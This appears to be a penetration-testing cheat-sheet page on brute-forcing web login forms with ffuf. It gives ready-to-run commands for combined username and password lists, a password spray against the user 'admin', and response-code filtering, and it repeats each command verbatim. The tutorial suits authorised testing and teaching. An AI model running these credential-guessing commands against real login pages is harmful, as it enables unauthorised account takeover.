← Back to search

Brute-Force Web Login Forms with ffuf

credentialstool

Summary

Brute-forces HTTP POST login forms with ffuf, using single or clustered wordlists and filtering out the failed-login response code.

Walkthrough

Use ffuf against HTTP POST login forms to spray credentials. The key is filtering responses so only successful logins stand out — here -fc 200 hides the failed-login status (adjust to match the target's behavior).

Steps

  • Username + password clusterbomb — load two wordlists (:W1 and :W2) and substitute both into the POST body:

``bash ffuf -w valid_usernames.txt:W1 -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/customers/login -fc 200 ``

  • Password-only spray for a known user — use the FUZZ keyword against a fixed username:

``bash ffuf -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/ -fc 200 ``

  • Inline clustered wordlists — define both wordlists in a single -w argument:

``bash ffuf -w users.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -fc 200 ``

Commands

bash

ffuf -w valid_usernames.txt:W1 -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/customers/login -fc 200

bash

ffuf -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/ -fc 200

bash

ffuf -w users.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -fc 200